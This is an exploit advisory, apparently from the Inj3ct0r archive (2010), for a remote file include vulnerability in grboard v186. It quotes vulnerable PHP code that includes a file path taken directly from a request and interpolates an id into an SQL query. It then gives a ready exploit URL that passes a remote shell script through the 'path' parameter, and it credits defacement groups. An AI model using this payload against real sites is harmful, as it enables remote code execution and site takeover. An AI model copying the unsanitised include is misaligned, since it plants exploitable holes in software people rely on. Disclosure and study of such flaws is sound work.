grboard v186 Remote File Include Vulnerability

Posted on 30 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>grboard v186 Remote File Include Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==============================================
grboard v186 Remote File Include Vulnerability
==============================================

# Author	  : untouch
# Location        : jakarta - Indonesia
# Situs           : antijasakom[dot]org, autosaved[dot]wordpress[dot]com
# Contact         : unkn0wn[dot]cr3w[at]ymail[dot]com
# Script: http://sirini.net/grboard/board.php?id=grskin&amp;articleNo=82
# Download: http://sirini.net/grboard/download.php?id=grskin&amp;articleNo=82&amp;num=1


######################################################################
#&lt;div class=&quot;latestGalleryTitle&quot;&gt;&lt;a href=&quot;&lt;?php echo $grboard; ?&gt;/board.php?id=&lt;?php echo $id; ?&gt;&quot;&gt;&lt;?php echo $latestTitle; ?&gt;&lt;/a&gt;&lt;/div&gt;
#&lt;?php
#// &amp;#52572;&amp;#44540;&amp;#44068;&amp;#47084;&amp;#47532;&amp;#50640; &amp;#50416;&amp;#51068; GD &amp;#50040;&amp;#45348;&amp;#51068; &amp;#50644;&amp;#51652; &amp;#48512;&amp;#47476;&amp;#44592;
#include_once $path.&quot;/thumbnail.php&quot;;
#
#// &amp;#44172;&amp;#49884;&amp;#47932; &amp;#47336;&amp;#54532;
#while($latest = mysql_fetch_array($getData))
#{
#	// &amp;#44033; &amp;#44172;&amp;#49884;&amp;#47932;&amp;#45817; &amp;#52392;&amp;#48512;&amp;#54028;&amp;#51068; &amp;#52395;&amp;#48264;&amp;#51704; &amp;#44163; &amp;#44032;&amp;#51256;&amp;#50752;&amp;#49436; &amp;#52376;&amp;#47532;
#	$target = $latest['no'];
#	$file = @mysql_fetch_array(mysql_query(&quot;select file_route1 from {$dbFIX}pds_save where id = '$id' and article_num = '$target'&quot;));
#	?&gt;
#&lt;div class=&quot;latestGalleryPhoto&quot;&gt;&lt;a href=&quot;&lt;?php echo $grboard; ?&gt;/board.php?id=&lt;?php echo $id; ?&gt;&amp;amp;articleNo=&lt;?php echo $latest['no']; ?&gt;&quot;&gt;
#&lt;?php echo makeLatestThumb($grboard.&quot;/&quot;.$file['file_route1'], $path, $id, $grboard, 100, 100); ?&gt;&lt;/a&gt;&lt;/div&gt;
#	&lt;?php
#} # while
#?&gt;
#&lt;div class=&quot;latestGalleryClear&quot;&gt;&lt;/div&gt;
######################################################################

#######################################################################################################
Exploit: http://[target]/[path]/latest/sirini_gallery2_play/list.php?path=http://[shellscript]
#######################################################################################################


#Special Thanks  : 

	- Gorontalo Defacer : cr4wl3r, bl4ck_3n91n3, aries.deris, Tawon Sparta
	
	- AntiJasakom Crew : Shamus, boys_rvn1609, 5ynL0rd, kqaj, dbugr, kiddies, g4pt3k
	
	- all Indogamers Admin &amp; Moderator
	
# Note : Don't Be Affraid to Attack Your Own Network ~






# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20